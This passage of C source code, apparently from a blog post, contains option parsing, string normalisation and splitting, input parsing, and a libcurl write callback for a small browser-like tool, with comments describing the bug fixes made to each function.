 *   -p <prompt>   interactive prompt (defaults to PROMPT)
 *   -x <proxy>    proxy to use
 * An unknown option prints the usage line and exits with status 2.
 *
 * `opts` must have been zeroed by the caller. If on_exit() fails the function
 * returns immediately, as before, leaving `opts` untouched.
 *
 * Fixes: getopt() returns an int, so the result is kept in an int. Stored in
 * a plain char, the comparison with -1 never matches on platforms where char
 * is unsigned and the loop does not end. A repeated option also no longer
 * leaks the previously duplicated value.
 */
void
parse_options(int argc, char **argv, struct opts *opts, void *br)
{
    int opt;

    if (on_exit(browser_shutdown, br))
        return;

    while ((opt = getopt(argc, argv, "x:p:")) != -1) {
        switch (opt) {
        case 'p':
            free(opts->prompt);
            opts->prompt = strdup(optarg);
            break;
        case 'x':
            free(opts->proxy);
            opts->proxy = strdup(optarg);
            break;
        default: /* '?' */
            fprintf(stderr, "Usage: %s [-p prompt] [-x proxy]\n", argv[0]);
            exit(2);
        }
    }

    if (!opts->prompt)
        opts->prompt = strdup(PROMPT);

    return;
}

/*
 * Back end of the errf() macro: print the printf-style message to stderr and
 * terminate the process with status `code`. Never returns.
 */
void
__errf(int code, const char *fmt, ...)
{
    va_list ap;

    va_start(ap, fmt);
    (void)vfprintf(stderr, fmt, ap);
    va_end(ap);

    exit(code);
}

/*
 * Back end of the errnonf() macro: print the printf-style message to stderr
 * and return to the caller.
 */
void
__errnonf(const char *fmt, ...)
{
    va_list ap;

    va_start(ap, fmt);
    (void)vfprintf(stderr, fmt, ap);
    va_end(ap);
}

/*
 * Normalise a delimiter-separated string.
 *
 * Trailing delimiters are removed from `inarg` IN PLACE, leading delimiters
 * are skipped, and every run of delimiters in between is collapsed into a
 * single one. The result is stored in a newly allocated string returned
 * through *out; the caller frees it.
 *
 * Returns the number of fields in the result (always >= 1, since the first
 * field counts even when empty), 0 when `inarg` is NULL (*out is set to
 * NULL), or -1 when the allocation fails (*out is NULL).
 *
 * Fix: the original pointed `end` at inarg + strlen(inarg) - 1 and walked
 * backwards without a lower bound, so an empty or all-delimiter input read
 * (and could write) before the start of the buffer. The trim below never
 * leaves the buffer; the produced output is unchanged for all other inputs.
 */
int
uniq(char **out, char *inarg, char delim)
{
    const char *in;
    char *end, *p;
    size_t len;
    int fields = 0, in_run = 0;

    if (!inarg) {
        if (out)
            *out = NULL;
        return 0;
    }

    /* strip trailing delimiters, bounded by the start of the buffer */
    end = inarg + strlen(inarg);
    while (end > inarg && end[-1] == delim)
        *--end = 0;

    /* skip leading delimiters, never running past the terminator */
    in = inarg;
    while (*in && *in == delim)
        in++;

    len = strlen(in) + 1;

    p = (char *)calloc(len, sizeof (char));
    *out = p;
    if (!p)
        return -1;

    for (; *in; in++) {
        if (*in == delim) {
            if (in_run)
                continue;       /* already emitted one for this run */
            in_run = 1;
            fields++;           /* each kept delimiter starts a new field */
        }
        else {
            in_run = 0;
        }
        *p++ = *in;
    }

    /* counts args[0] as well */
    return fields + 1;
}

/*
 * Split `buf` at every single space into newly allocated strings stored in
 * arg[0..]; the list is terminated with a NULL entry. `buf` itself is left
 * untouched because the splitting is done on a private copy.
 *
 * `num` is the capacity of `arg` INCLUDING the NULL terminator; at most
 * num - 1 tokens are stored. With num <= 0 nothing is written.
 *
 * Fixes: the working copy is now released. The original freed `tmp` only
 * after strsep() had set it to NULL, so the copy leaked on every call.
 * `num` is also honoured so the output array cannot be overrun, and
 * allocation failures end the list instead of being dereferenced.
 */
void
split(char **arg, char *buf, int num)
{
    char *copy, *cursor, *tok;
    int i = 0;

    if (!arg || num <= 0)
        return;

    arg[0] = NULL;
    if (!buf)
        return;

    /* make a safe copy of buf since strsep will mangle it */
    copy = strdup(buf);
    if (!copy)
        return;

    cursor = copy;
    while (i < num - 1 && (tok = strsep(&cursor, " ")) != NULL) {
        arg[i] = strdup(tok);
        if (!arg[i])
            break;              /* list stays terminated at the failure */
        i++;
    }

    arg[i] = NULL;

    /* free the start of the copy; strsep() only advanced `cursor` */
    free(copy);
}

/*
 * Turn one input line into a NULL-terminated argument vector.
 *
 * Trailing CR/LF characters are stripped from `in` in place, runs of spaces
 * are normalised by uniq(), and the result is split at spaces. *num receives
 * the number of arguments (command included).
 *
 * Returns the vector (release it with free_args()), or NULL with *num set to
 * 0 when the line cannot be parsed or memory runs out. The caller in main()
 * already treats NULL as a non-fatal error.
 *
 * Fixes: the uniq() result and the allocation are now checked. Previously a
 * failed uniq() left `stripbuf` unusable and a failed malloc() was passed
 * straight to memset(). The line length is also computed once instead of on
 * every loop iteration.
 */
char **
parse_input(char *in, int *num)
{
    char **args, *stripbuf = NULL;
    size_t n;
    int count, k;

    if (!in || !num) {
        if (num)
            *num = 0;
        return NULL;
    }

    n = strlen(in);
    while (n > 0 && (in[n - 1] == '\n' || in[n - 1] == '\r'))
        in[--n] = 0;

    count = uniq(&stripbuf, in, ' ');
    if (count <= 0 || !stripbuf) {
        free(stripbuf);
        *num = 0;
        return NULL;
    }
    *num = count;

    /* one extra slot for the terminating NULL entry */
    args = (char **)calloc((size_t)count + 1, sizeof (char *));
    if (!args) {
        free(stripbuf);
        *num = 0;
        return NULL;
    }

    /*
     * we split buf into chunks delimited by ' ': these represent cmd
     * and cmd args. Due to the nature of split, we don't care about
     * ' " ` ; and so on
     */
    split(args, stripbuf, count + 1);

    free(stripbuf);

    /* callers index args[0] unconditionally, so never hand back an empty list */
    if (!args[0]) {
        for (k = 1; k < count; k++)
            free(args[k]);
        free(args);
        *num = 0;
        return NULL;
    }

    return args;
}

/*
 * libcurl write callback (CURLOPT_WRITEFUNCTION): append the received chunk
 * of size * nmemb bytes at `ptr` to the struct page passed through `data`,
 * keeping page->memory NUL-terminated and page->size equal to the number of
 * payload bytes stored.
 *
 * Returns the number of bytes consumed. On allocation failure it returns 0,
 * which differs from the chunk size and therefore makes libcurl abort the
 * transfer; the data collected so far stays intact.
 *
 * Fixes: the original returned CURLE_WRITE_ERROR (an error CODE) as a byte
 * COUNT, which libcurl reads as success whenever the chunk happens to be
 * exactly that many bytes long. The buffer is now grown with realloc()
 * instead of allocating, zeroing and copying the whole page per chunk.
 */
size_t
map_page(void *ptr, size_t size, size_t nmemb, void *data)
{
    size_t realsize = size * nmemb;
    struct page *mem = (struct page *)data;
    char *grown;

    if (!realsize)
        return realsize;

    /* refuse sizes whose sum (plus terminator) would wrap around */
    if (realsize >= (size_t)-1 - mem->size)
        return 0;

    /* realloc(NULL, n) behaves like malloc(n) for the very first chunk */
    grown = (char *)realloc(mem->memory, mem->size + realsize + 1);
    if (!grown)
        return 0;

    memcpy(grown + mem->size, ptr, realsize);
    mem->size += realsize;
    grown[mem->size] = 0;

    mem->memory = grown;

    return realsize;
}

2010/01/19 21:16 2010/01/19 21:16
Posted by 차상길.